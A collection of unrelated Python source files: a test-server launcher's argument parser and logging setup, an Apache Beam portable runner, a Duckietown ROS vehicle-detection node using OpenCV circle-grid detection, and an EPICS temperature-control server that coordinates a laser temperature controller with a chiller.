overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--webtransport-h3", action="store_true",
help="Enable WebTransport over HTTP/3 server")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.add_argument("--verbose", action="store_true", help="Enable verbose logging")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
class MpContext(object):
def __getattr__(self, name):
return getattr(multiprocessing, name)
def get_logger(log_level, log_handlers):
"""Get a logger configured to log at level log_level
If the logger has existing handlers the log_handlers argument is ignored.
Otherwise the handlers in log_handlers are added to the logger. If there are
no log_handlers passed and no configured handlers, a stream handler is added
to the logger.
Typically this is called once per process to set up logging in that process.
:param log_level: - A string representing a log level e.g. "info"
:param log_handlers: - Optional list of Handler objects.
"""
logger = logging.getLogger()
logger.setLevel(getattr(logging, log_level.upper()))
if not logger.hasHandlers():
if log_handlers is not None:
for handler in log_handlers:
logger.addHandler(handler)
else:
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter("[%(asctime)s %(processName)s] %(levelname)s - %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
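# Illustrative sketch (not part of the original module): get_logger is meant to
# be called once per process. Handlers are only attached when the root logger
# has none yet, so calling it again later simply adjusts the level.
def _example_logger_setup(verbose=False):
    level = "debug" if verbose else "info"
    return get_logger(level, log_handlers=None)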
def run(config_cls=ConfigBuilder, route_builder=None, mp_context=None, log_handlers=None,
**kwargs):
logger = get_logger("INFO", log_handlers)
if mp_context is None:
if hasattr(multiprocessing, "get_context"):
mp_context = multiprocessing.get_context()
else:
mp_context = MpContext()
with build_config(logger,
os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
# This sets the right log level
logger = get_logger(config.log_level, log_handlers)
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(logger, config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(logger, config, routes, mp_context, log_handlers)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(logger, config, routes, mp_context, log_handlers, **kwargs)
if not kwargs.get("exit_after_start"):
try:
# Periodically check if all the servers are alive
server_process_exited = False
while not server_process_exited:
for server in iter_servers(servers):
server.proc.join(1)
if not server.proc.is_alive():
server_process_exited = True
break
except KeyboardInterrupt:
pass
failed_subproc = 0
for server in iter_servers(servers):
subproc = server.proc
if subproc.is_alive():
logger.info('Status of subprocess "%s": running', subproc.name)
server.stop(timeout=1)
if server.proc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly', subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d',
subproc.name, subproc.exitcode)
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import logging
import os
import threading
import grpc
from apache_beam import coders
from apache_beam import metrics
from apache_beam.internal import pickler
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import portable_stager
__all__ = ['PortableRunner']
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self, is_embedded_fnapi_runner=False):
self.is_embedded_fnapi_runner = is_embedded_fnapi_runner
@staticmethod
def default_docker_image():
if 'USER' in os.environ:
# Perhaps also test if this was built?
logging.info('Using latest locally built Python SDK docker image.')
return os.environ['USER'] + '-docker-apache.bintray.io/beam/python:latest'
else:
logging.warning('Could not find a Python SDK docker image.')
return 'unknown'
def run_pipeline(self, pipeline):
docker_image = (
pipeline.options.view_as(PortableOptions).harness_docker_image
or self.default_docker_image())
job_endpoint = pipeline.options.view_as(PortableOptions).job_endpoint
if not job_endpoint:
raise ValueError(
'job_endpoint should be provided while creating runner.')
proto_context = pipeline_context.PipelineContext(
default_environment_url=docker_image)
proto_pipeline = pipeline.to_runner_api(context=proto_context)
if not self.is_embedded_fnapi_runner:
# Java has different expectations about coders
# (windowed in Fn API, but *un*windowed in runner API), whereas the
# embedded FnApiRunner treats them consistently, so we must guard this
# for now, until FnApiRunner is fixed.
# See also BEAM-2717.
for pcoll in proto_pipeline.components.pcollections.values():
if pcoll.coder_id not in proto_context.coders:
# This is not really a coder id, but a pickled coder.
coder = coders.registry.get_coder(pickler.loads(pcoll.coder_id))
pcoll.coder_id = proto_context.coders.get_id(coder)
proto_context.coders.populate_map(proto_pipeline.components.coders)
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# TODO: Define URNs for options.
options = {'beam:option:' + k + ':v1': v
for k, v in pipeline._options.get_all_options().iteritems()
if v is not None}
job_service = beam_job_api_pb2_grpc.JobServiceStub(
grpc.insecure_channel(job_endpoint))
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(options)))
if prepare_response.artifact_staging_endpoint.url:
stager = portable_stager.PortableStager(
grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
pipeline._options,
staging_location='')
else:
retrieval_token = None
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
return PipelineResult(job_service, run_response.job_id)
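# Illustrative sketch (not part of the original module): the pipeline passed to
# run_pipeline() is expected to carry PortableOptions with job_endpoint set
# (e.g. built from ['--job_endpoint=localhost:8099']; the address is an
# assumption for the example only).
def _example_submit(pipeline):
  # Prepares the job over the Job API, stages artifacts when a staging
  # endpoint is advertised, and returns a PipelineResult handle.
  return PortableRunner().run_pipeline(pipeline)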
class PortableMetrics(metrics.metric.MetricResults):
def __init__(self):
pass
def query(self, filter=None):
return {'counters': [],
'distributions': [],
'gauges': []}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
def cancel(self):
self._job_service.Cancel()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
return PortableMetrics()
def wait_until_finish(self):
def read_messages():
for message in self._job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=self._job_id)):
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
for state_response in self._job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)):
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s.' % (self._job_id, self._state))
return self._state
|
vehicle_detection_node.py
|
#!/usr/bin/env python
from copy import deepcopy
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import BoolStamped
from geometry_msgs.msg import Point32
from mutex import mutex
from sensor_msgs.msg import CompressedImage, Image
from std_msgs.msg import Float32
import cv2
import numpy as np
import os
import rospkg
import rospy
import threading
import time
import yaml
class VehicleDetectionNode(object):
def __init__(self):
self.node_name = rospy.get_name()
self.bridge = CvBridge()
self.active = True
self.config = self.setupParam("~config", "baseline")
self.cali_file_name = self.setupParam("~cali_file_name", "default")
rospack = rospkg.RosPack()
self.cali_file = rospack.get_path('duckietown') + \
"/config/" + self.config + \
"/vehicle_detection/vehicle_detection_node/" + \
self.cali_file_name + ".yaml"
if not os.path.isfile(self.cali_file):
rospy.logwarn("[%s] Can't find calibration file: %s.\n"
% (self.node_name, self.cali_file))
self.loadConfig(self.cali_file)
self.sub_image = rospy.Subscriber("~image", Image,
self.cbImage, queue_size=1)
self.sub_switch = rospy.Subscriber("~switch", BoolStamped,
self.cbSwitch, queue_size=1)
self.pub_detection = rospy.Publisher("~detection",
BoolStamped, queue_size=1)
self.pub_circlepattern_image = rospy.Publisher("~circlepattern_image",
Image, queue_size=1)
self.pub_time_elapsed = rospy.Publisher("~detection_time",
Float32, queue_size=1)
self.lock = mutex()
rospy.loginfo("[%s] Initialization completed" % (self.node_name))
def setupParam(self,param_name,default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name, value)
rospy.loginfo("[%s] %s = %s " %(self.node_name,param_name,value))
return value
def loadConfig(self, filename):
        with open(filename, 'r') as stream:
            data = yaml.load(stream)
self.circlepattern_dims = tuple(data['circlepattern_dims']['data'])
self.blobdetector_min_area = data['blobdetector_min_area']
self.blobdetector_min_dist_between_blobs = data['blobdetector_min_dist_between_blobs']
self.publish_circles = data['publish_circles']
rospy.loginfo('[%s] circlepattern_dim : %s' % (self.node_name,
self.circlepattern_dims,))
rospy.loginfo('[%s] blobdetector_min_area: %.2f' % (self.node_name,
self.blobdetector_min_area))
rospy.loginfo('[%s] blobdetector_min_dist_between_blobs: %.2f' % (self.node_name,
self.blobdetector_min_dist_between_blobs))
rospy.loginfo('[%s] publish_circles: %r' % (self.node_name,
self.publish_circles))
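    def exampleConfig(self):
        # Hypothetical helper (not part of the original node): the dictionary
        # shape loadConfig() expects after YAML parsing; every value here is an
        # assumption for illustration only.
        return {
            'circlepattern_dims': {'data': [7, 3]},
            'blobdetector_min_area': 10.0,
            'blobdetector_min_dist_between_blobs': 2.0,
            'publish_circles': True,
        }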
def cbSwitch(self, switch_msg):
self.active = switch_msg.data
def cbImage(self, image_msg):
if not self.active:
return
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
        # Returns right away
def processImage(self, image_msg):
if self.lock.testandset():
vehicle_detected_msg_out = BoolStamped()
try:
image_cv=self.bridge.imgmsg_to_cv2(image_msg,"bgr8")
except CvBridgeError as e:
print e
start = rospy.Time.now()
params = cv2.SimpleBlobDetector_Params()
params.minArea = self.blobdetector_min_area
params.minDistBetweenBlobs = self.blobdetector_min_dist_between_blobs
simple_blob_detector = cv2.SimpleBlobDetector(params)
(detection, corners) = cv2.findCirclesGrid(image_cv,
self.circlepattern_dims, flags=cv2.CALIB_CB_SYMMETRIC_GRID,
blobDetector=simple_blob_detector)
elapsed_time = (rospy.Time.now() - start).to_sec()
self.pub_time_elapsed.publish(elapsed_time)
vehicle_detected_msg_out.data = detection
self.pub_detection.publish(vehicle_detected_msg_out)
if self.publish_circles:
cv2.drawChessboardCorners(image_cv,
self.circlepattern_dims, corners, detection)
image_msg_out = self.bridge.cv2_to_imgmsg(image_cv, "bgr8")
self.pub_circlepattern_image.publish(image_msg_out)
self.lock.unlock()
if __name__ == '__main__':
rospy.init_node('vehicle_detection', anonymous=False)
vehicle_detection_node = VehicleDetectionNode()
rospy.spin()
|
temperature_server_IOC copy.py
|
"""Temperature controller server
The server communicates with the Lightwave IOC (previously known as the temperature controller IOC) and the Oasis IOC to synchronize temperature changes.
Authors: Valentyn Stadnydskyi, Friedrich Schotte
Date created: 2019-05-08
Date last modified: 2019-05-14
"""
__version__ = "0.1" # Friedrich Schotte: bug fixes
from logging import debug,warn,info,error
import os
from IOC import IOC
import traceback
from time import time,sleep
from numpy import empty, mean, std, zeros, abs, where, nan , isnan
import numpy.polynomial.polynomial as poly
from scipy.interpolate import interp1d
from CA import caget, caput
from CAServer import casput,casget,casdel
import platform
try:
computer_name = platform.node()
except:
error(traceback.format_exc())
computer_name = 'unknown'
import socket
try:
ip_address = socket.gethostbyname(socket.gethostname())
except:
error(traceback.format_exc())
ip_address = '0.0.0.0'
class Temperature_Server_IOC(object):
name = "temperature_server_IOC"
from persistent_property import persistent_property
prefix = persistent_property("prefix","NIH:TEMP")
SCAN = persistent_property("SCAN",0.5)
P_default = persistent_property("P_default",1.000)
I_default = persistent_property("I_default",0.316)
D_default = persistent_property("D_default",0.562)
oasis_slave = persistent_property("oasis_slave",1)
temperature_oasis_switch = persistent_property("T_threshold",83.0)
idle_temperature_oasis = persistent_property("idle_temperature_oasis",8.0)
temperature_oasis_limit_high = persistent_property("temperature_oasis_limit_high",45.0)
oasis_headstart_time = persistent_property("oasis_headstart_time",15.0)
lightwave_prefix = persistent_property("lightwave_prefix",'NIH:LIGHTWAVE')
oasis_prefix = persistent_property("oasis_prefix",'NIH:CHILLER')
set_point_update_period = persistent_property("set_point_update_period",0.5)
running = False
last_valid_reply = 0
was_online = False
ramping_cancelled = False
idle_temperature = 22.0
time_points = []
temp_points = []
def get_EPICS_enabled(self):
return self.running
def set_EPICS_enabled(self,value):
from thread import start_new_thread
if value:
if not self.running: start_new_thread(self.run,())
else: self.running = False
EPICS_enabled = property(get_EPICS_enabled,set_EPICS_enabled)
def startup(self):
from CAServer import casput,casmonitor
from CA import caput,camonitor
from numpy import nan
#self.P_default , self.I_default , self.D_default = 1.0,0.316,0.562
#print('startup with prefix = %r' %self.prefix)
casput(self.prefix+".SCAN",self.SCAN)
casput(self.prefix+".DESC",value = "Temperature server IOC: a System Layer server that orchestrates setting on Lightwave IOC and Oasis IOC.", update = False)
casput(self.prefix+".EGU",value = "C")
# Set defaults
casput(self.prefix+".VAL",value = nan)
casput(self.prefix+".VAL_ADV",value = nan)
casput(self.prefix+".RBV",value = nan)
casput(self.prefix+".P",value = nan)
casput(self.prefix+".I",value = nan)
casput(self.prefix+".TIME_POINTS",self.time_points)
casput(self.prefix+".TEMP_POINTS",self.temp_points)
casput(self.prefix+".FAULTS"," ")
casput(self.prefix+".DMOV",value = nan)
casput(self.prefix+".KILL",value = 'write password to kill the process')
casput(self.prefix+".P_default",value = self.P_default)
casput(self.prefix+".I_default",value = self.I_default)
casput(self.prefix+".D_default",value = self.D_default)
casput(self.prefix+".oasis_slave",value = self.oasis_slave)
casput(self.prefix+".temperature_oasis_switch",value = self.temperature_oasis_switch)
casput(self.prefix+".idle_temperature_oasis",value = self.idle_temperature_oasis)
casput(self.prefix+".temperature_oasis_limit_high",value = self.temperature_oasis_limit_high)
casput(self.prefix+".oasis_headstart_time",value = self.oasis_headstart_time)
casput(self.prefix+".lightwave_prefix",value = self.lightwave_prefix)
casput(self.prefix+".oasis_prefix",value = self.oasis_prefix)
casput(self.prefix+".set_point_update_period",value = self.set_point_update_period)
casput(self.prefix+".oasis_RBV",value = nan)
casput(self.prefix+".oasis_VAL",value = nan)
casput(self.prefix+".processID",value = os.getpid())
casput(self.prefix+".computer_name",value = computer_name)
casput(self.prefix+".ip_address",value = ip_address)
#PV with a list of all process variable registered at the current Channel Access Server
casput(self.prefix+".LIST_ALL_PVS",value = self.get_pv_list())
# Monitor client-writable PVs.
casmonitor(self.prefix+".VAL",callback=self.monitor)
casmonitor(self.prefix+".VAL_ADV",callback=self.monitor)
casmonitor(self.prefix+".TIME_POINTS",callback=self.monitor)
casmonitor(self.prefix+".TEMP_POINTS",callback=self.monitor)
casmonitor(self.prefix+".KILL",callback=self.monitor)
casmonitor(self.prefix+".P_default",callback=self.monitor)
casmonitor(self.prefix+".I_default",callback=self.monitor)
casmonitor(self.prefix+".D_default",callback=self.monitor)
casmonitor(self.prefix+".oasis_slave",callback=self.monitor)
casmonitor(self.prefix+".temperature_oasis_switch",callback=self.monitor)
casmonitor(self.prefix+".idle_temperature_oasis",callback=self.monitor)
casmonitor(self.prefix+".temperature_oasis_limit_high",callback=self.monitor)
casmonitor(self.prefix+".oasis_headstart_time",callback=self.monitor)
casmonitor(self.prefix+".lightwave_prefix",callback=self.monitor)
casmonitor(self.prefix+".oasis_prefix",callback=self.monitor)
casmonitor(self.prefix+".set_point_update_period",callback=self.monitor)
#############################################################################
        ## Monitor server-writable PVs that come from other servers
## Monitor Timing system IOC
from timing_system import timing_system
camonitor(timing_system.acquiring.PV_name,callback=self.on_acquire)
## Lightwave Temperature controller server
prefix = self.lightwave_prefix
camonitor(prefix+".VAL",callback=self.lightwave_monitor)
camonitor(prefix+".RBV",callback=self.lightwave_monitor)
camonitor(prefix+".P",callback=self.lightwave_monitor)
camonitor(prefix+".I",callback=self.lightwave_monitor)
camonitor(prefix+".DMOV",callback=self.lightwave_monitor)
## Oasis chiller server
prefix = self.oasis_prefix
camonitor(prefix+".VAL",callback=self.oasis_monitor)
camonitor(prefix+".RBV",callback=self.oasis_monitor)
## Create local circular buffers
from circular_buffer_LL import Server
self.buffers = {}
self.buffers['oasis_RBV'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['oasis_VAL'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['oasis_FAULTS'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_RBV'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_P'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_I'] = Server(size = (2,1*3600*2) , var_type = 'float64')
self.buffers['lightwave_VAL'] = Server(size = (2,1*3600*2) , var_type = 'float64')
def update_once(self):
from CAServer import casput
from numpy import isfinite,isnan,nan
from time import time
        from time import sleep
pass
def run(self):
"""Run EPICS IOC"""
self.startup()
self.running = True
while self.running:
sleep(1)
self.running = False
def start(self):
"""Run EPCIS IOC in background"""
from threading import Thread
task = Thread(target=self.run,name="temperature_server_IOC.run")
task.daemon = True
task.start()
def shutdown(self):
from CAServer import casdel
print('SHUTDOWN command received')
self.running = False
casdel(self.prefix)
del self
def get_pv_list(self):
from CAServer import PVs
lst = list(PVs.keys())
#lst_new = []
#for item in lst:
# lst_new.append(item.replace(self.prefix,'').replace('.',''))
return lst#lst_new
def monitor(self,PV_name,value,char_value):
"""Process PV change requests"""
from CAServer import casput
from CA import caput
print("monitor: %s = %r" % (PV_name,value))
if PV_name == self.prefix+".VAL_ADV":
if self.get_set_lightwaveT() != value or self.get_set_oasisT() != self.temp_to_oasis(value):
self.set_T(value)
if PV_name == self.prefix+".VAL":
if self.get_set_lightwaveT() != value or self.get_set_oasisT() != self.temp_to_oasis(value):
self.set_adv_T(value)
if PV_name == self.prefix + ".oasis_VAL":
if self.get_set_oasisT() != value:
self.set_set_oasisT(value)
if PV_name == self.prefix + ".TIME_POINTS":
self.time_points = value
if PV_name == self.prefix + ".TEMP_POINTS":
self.temp_points = value
if PV_name == self.prefix + ".KILL":
if value == 'shutdown':
self.shutdown()
if PV_name == self.prefix + ".P_default":
self.P_default = value
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
if PV_name == self.prefix + ".I_default":
self.I_default = value
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
if PV_name == self.prefix + ".D_default":
self.D_default = value
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
if PV_name == self.prefix + ".oasis_slave":
self.oasis_slave = value
if PV_name == self.prefix + ".temperature_oasis_switch":
self.temperature_oasis_switch = value
if PV_name == self.prefix + ".idle_temperature_oasis":
self.idle_temperature_oasis = value
if PV_name == self.prefix + ".temperature_oasis_limit_high":
self.temperature_oasis_limit_high = value
if PV_name == self.prefix + ".oasis_headstart_time":
self.oasis_headstart_time = value
if PV_name == self.prefix + ".lightwave_prefix":
self.lightwave_prefix = value
if PV_name == self.prefix + ".oasis_prefix":
self.oasis_prefix = value
if PV_name == self.prefix + ".set_point_update_period":
self.set_point_update_period = value
def lightwave_monitor(self,PV_name,value,char_value):
#print('time: %r, PV_name = %r,value= %r,char_value = %r' %(time(),PV_name,value,char_value) )
from CA import cainfo
from CAServer import casput
prefix = self.lightwave_prefix
if PV_name == prefix+".VAL":
arr = empty((2,1))
arr[0] = cainfo(prefix+".VAL","timestamp")
arr[1] = float(value)
self.buffers['lightwave_VAL'].append(arr)
casput(self.prefix +'.VAL',value = float(value))
if PV_name == prefix+".RBV":
arr = empty((2,1))
arr[0] = cainfo(prefix+".RBV","timestamp")
arr[1] = float(value)
self.buffers['lightwave_RBV'].append(arr)
casput(self.prefix +'.RBV',value = float(value))
if PV_name == prefix+".P":
arr = empty((2,1))
arr[0] = cainfo(prefix+".P","timestamp")
arr[1] = float(value)
self.buffers['lightwave_P'].append(arr)
casput(self.prefix +'.P',value = float(value))
if PV_name == prefix+".I":
arr = empty((2,1))
arr[0] = cainfo(prefix+".I","timestamp")
arr[1] = float(value)
self.buffers['lightwave_I'].append(arr)
casput(self.prefix +'.I',value = float(value))
#Done Move PV
if PV_name == prefix+".DMOV":
casput(self.prefix +'.DMOV',value = float(value))
def oasis_monitor(self,PV_name,value,char_value):
#print('oasis_monitor: time: %r, PV_name = %r,value= %r,char_value = %r' %(time(),PV_name,value,char_value) )
from CA import cainfo
prefix = self.oasis_prefix
if PV_name == prefix+".VAL":
arr = empty((2,1))
arr[0] = cainfo(prefix+".VAL","timestamp")
arr[1] = float(value)
self.buffers['oasis_VAL'].append(arr)
casput(self.prefix +'.oasis_VAL',value = float(value))
if PV_name == prefix+".RBV":
arr = empty((2,1))
arr[0] = cainfo(prefix+".RBV","timestamp")
arr[1] = float(value)
self.buffers['oasis_RBV'].append(arr)
casput(self.prefix +'.oasis_RBV',value = float(value))
## Temperature trajectory
def on_acquire(self):
"""
starts T-Ramp.
Usually called from monitor()
"""
print('on acquire')
self.ramping = self.acquiring
self.start_ramping()
def start_ramping(self):
"""
starts T-Ramp run_ramping_once method in a separate thread
"""
from thread import start_new_thread
start_new_thread(self.run_ramping_once,())
def run_ramping_once(self):
"""
runs ramping trajectory defined by self.time_points and self.temperaturs
"""
from time_string import date_time
info("Ramp start time: %s" % date_time(self.start_time))
from time import time,sleep
from numpy import where, asarray
if len(self.temperatures) != 0:
max_set_T = max(self.temperatures)
min_set_T = min(self.temperatures)
else:
min_set_T = nan
max_set_T = nan
for (t,T) in zip(self.times,self.temperatures):
dt = self.start_time+t - time()
if dt > 0:
sleep(dt)
current_setT = self.get_setT()
debug('t = %r, T = %r,dt = %r' %(t,T,dt))
self.set_ramp_T(T)
if T == max_set_T or T == min_set_T:
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
else:
self.set_PIDCOF((self.P_default,0.0,0.0))
#coeffs = asarray([ 4.33863739e-01, -5.45776351e-02, 3.90549564e-04])
#limit = poly.polyval(T, coefs)
# if T > current_setT:
# caput('NIH:LIGHTWAVE.IHLM',limit + 0.2)
# caput('NIH:LIGHTWAVE.ILLM',-4.0)
# else:
# caput('NIH:LIGHTWAVE.IHLM',+4.0)
# caput('NIH:LIGHTWAVE.ILLM',limit - 0.2)
try:
indices = where(self.times >= t+self.oasis_headstart_time)[0][0:1]
debug(indices)
if len(indices) > 0:
idx = indices[0]
self.set_set_oasisT(self.oasis_temperatures[idx])
debug('time = %r, oasis T = %r' %(t,self.temp_to_oasis(self.temperatures[idx])))
except:
error(traceback.format_exc())
if self.ramping_cancelled: break
info("Ramp ended")
self.set_PIDCOF((self.P_default,self.I_default,self.D_default))
self.ramping_cancelled = False
self.ramping = False
# caput('NIH:LIGHTWAVE.IHLM',+4.0)
# caput('NIH:LIGHTWAVE.ILLM',-4.0)
@property
def acquiring(self):
from timing_system import timing_system
return timing_system.acquiring.value
@property
def start_time(self):
from numpy import nan
start_time = nan
from timing_system import timing_system
if timing_system.acquiring.value == 1:
from CA import cainfo
start_time = cainfo(timing_system.acquiring.PV_name,"timestamp")
return start_time
@property
def times(self):
"""
converts self.time_points to an array of values with specified spacing (readT_time_spacing0
"""
from numpy import arange,concatenate
min_dt = self.set_point_update_period
times = [[]]
for i in range(0,len(self.time_points)-1):
T0,T1 = self.time_points[i],self.time_points[i+1]
DT = T1-T0
N = max(int(DT/min_dt),1)
dt = DT/N
T = T0 + arange(0,N)*dt
times.append(T)
if len(self.time_points) > 0:
times.append([self.time_points[-1]])
times = concatenate(times)
return times
@property
def temperatures(self):
temperatures = []
time_points = self.time_points[0:self.N_points]
temp_points = self.temp_points[0:self.N_points]
if len(temp_points) > 1:
from scipy.interpolate import interp1d
f = interp1d(time_points,temp_points, kind='linear',bounds_error=False)
temperatures = f(self.times)
if len(temp_points) == 1:
from numpy import array
temperatures = array(temp_points)
return temperatures
@property
def oasis_temperatures(self):
from numpy import max
if len(self.temperatures) == 0:
t_oasis = []
else:
temp_points = self.temperatures
first_temp = self.temperatures[0]
max_temp = max(temp_points)
t_oasis = []
idx = 0
for temp in temp_points:
oasis_temp = self.temp_to_oasis(temp)
if max_temp >=self.temperature_oasis_switch:
if idx <=1:
t_oasis.append(oasis_temp)
elif idx > 1:
if temp > temp_points[idx-1] and temp_points[idx-1] > temp_points[idx-2]:
t_oasis.append(self.temperature_oasis_limit_high)
elif temp < temp_points[idx-1] and temp_points[idx-1] < temp_points[idx-2]:
t_oasis.append(self.idle_temperature_oasis)
else:
t_oasis.append(t_oasis[idx-2])
else:
t_oasis.append(oasis_temp)
idx +=1
return t_oasis
@property
def oasis_times(self):
time_points = self.times
time_oasis = []
        for t in time_points:
            time_oasis.append(t - self.oasis_headstart_time)
return time_oasis
@property
def N_points(self):
return min(len(self.time_points),len(self.temp_points))
def get_setT(self):
value = self.buffers['lightwave_VAL'].get_last_N(N = 1)[1,0]
return value
def set_setT(self,value):
debug("set_point = %r" % value)
value = float(value)
if self.get_setT() != value:
            self.set_set_lightwaveT(value)
            self.set_set_oasisT(self.temp_to_oasis(value))
setT = property(get_setT,set_setT)
def get_lightwaveT(self):
value = self.buffers['lightwave_RBV'].get_last_N(N = 1)[1,0]
return value
lightwaveT = property(get_lightwaveT)
def get_set_lightwaveT(self):
value = self.buffers['lightwave_VAL'].get_last_N(N = 1)[1,0]
return value
def set_set_lightwaveT(self,value):
from CA import caput, cawait
from numpy import isnan
        if not isnan(value):
caput(self.lightwave_prefix + '.VAL', value = float(value))
cawait(self.lightwave_prefix + '.VAL')
set_lightwaveT = property(get_set_lightwaveT,set_set_lightwaveT)
def get_oasisT(self):
value = self.buffers['oasis_RBV'].get_last_N(N = 1)[1,0]
return value
oasisT = property(get_oasisT)
def get_set_oasisT(self):
value = self.buffers['oasis_VAL'].get_last_N(N = 1)[1,0]
return value
def set_set_oasisT(self,value):
from CA import caput
from numpy import isnan
if self.get_set_oasisT() != float(value):
            if not isnan(value):
caput(self.oasis_prefix+'.VAL', value = float(value))
set_oasisT = property(get_set_oasisT,set_set_oasisT)
def set_T(self,value):
value = float(value)
if value != self.get_set_lightwaveT() or self.temp_to_oasis(value) != self.get_set_oasisT():
if self.oasis_slave:
self.set_set_oasisT(self.temp_to_oasis(value))
self.set_set_lightwaveT(value)
def set_ramp_T(self,value):
value = float(value)
if value != self.get_lightwaveT():
self.set_set_lightwaveT(value)
def set_adv_T(self,value):
value = float(value)
if value != self.get_lightwaveT() or self.temp_to_oasis(value) != self.get_set_oasisT() :
self.set_set_oasisT(self.temp_to_oasis(value))
self.set_PIDCOF((self.P_default,0.0,self.D_default))
self.set_set_lightwaveT(value)
info('set_set_lightwaveT %r at %r' %(value , time()))
